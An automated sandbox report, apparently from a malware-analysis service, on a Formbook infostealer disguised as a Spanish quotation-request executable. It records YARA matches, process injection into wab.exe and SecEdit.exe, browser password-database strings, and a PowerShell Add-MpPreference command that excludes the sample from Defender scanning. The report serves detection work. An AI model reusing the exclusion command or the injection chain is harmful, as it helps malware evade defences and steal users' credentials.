            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE29A012_2_02FE29A0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FF696212_2_02FF6962
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE995012_2_02FE9950
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FFB95012_2_02FFB950
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0300E8F012_2_0300E8F0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309FF0912_2_0309FF09
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03022F2812_2_03022F28
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03000F3012_2_03000F30
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03054F4012_2_03054F40
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE9EB012_2_02FE9EB0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FF2E9012_2_02FF2E90
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE0E5912_2_02FE0E59
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309FFB112_2_0309FFB1
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FECFE012_2_02FECFE0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309EE2612_2_0309EE26
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FD2FC812_2_02FD2FC8
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE1F9212_2_02FE1F92
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309CE9312_2_0309CE93
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0309EEDB12_2_0309EEDB
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FD0CF212_2_02FD0CF2
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03091D5A12_2_03091D5A
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03097D7312_2_03097D73
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE0C0012_2_02FE0C00
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FDADE012_2_02FDADE0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03059C3212_2_03059C32
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FFFDC012_2_02FFFDC0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FF8DBF12_2_02FF8DBF
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_03080CB512_2_03080CB5
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FE3D4012_2_02FE3D40
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02FEAD0012_2_02FEAD00
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0058176012_2_00581760
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_005711A112_2_005711A1
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_005832C012_2_005832C0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0059A29012_2_0059A290
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0057C94012_2_0057C940
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0057C93912_2_0057C939
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0057CB6012_2_0057CB60
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0057ABD712_2_0057ABD7
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_0057ABE012_2_0057ABE0
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFB20812_2_02DFB208
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFA3FC12_2_02DFA3FC
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFC19C12_2_02DFC19C
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFA46612_2_02DFA466
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFA43712_2_02DFA437
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFBE0312_2_02DFBE03
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: 12_2_02DFBCE412_2_02DFBCE4
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 036AF290 appears 105 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 03665130 appears 36 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0369EA12 appears 86 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0361B970 appears 271 times
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 03677E54 appears 89 times
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 0305F290 appears 105 times
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 03027E54 appears 86 times
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 03015130 appears 36 times
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 02FCB970 appears 269 times
            Source: C:\Windows\SysWOW64\SecEdit.exeCode function: String function: 0304EA12 appears 84 times
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7448 -s 1404
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeStatic PE information: No import functions for PE file found
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, 00000000.00000000.1336075939.0000023E06587000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameArkhangelsk.exe4 vs z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeBinary or memory string: OriginalFilenameArkhangelsk.exe4 vs z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe
            Source: 4.2.wab.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.wab.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1543223916.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3791309968.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.3795206841.00000000053A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3791449632.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3790655186.0000000000570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3792934989.0000000004160000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.1543864387.0000000004D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@17/11@17/10
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7448
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4m11nsi.hvv.ps1Jump to behavior
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: SecEdit.exe, 0000000C.00000002.3795946825.0000000007944000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3791538876.0000000002BE4000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 0000000C.00000002.3791538876.0000000002BE8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeReversingLabs: Detection: 36%
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeFile read: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe"
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7448 -s 1404
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
            Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
            Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"
            Source: C:\Windows\SysWOW64\SecEdit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: scecli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: wintypes.dllJump to behavior
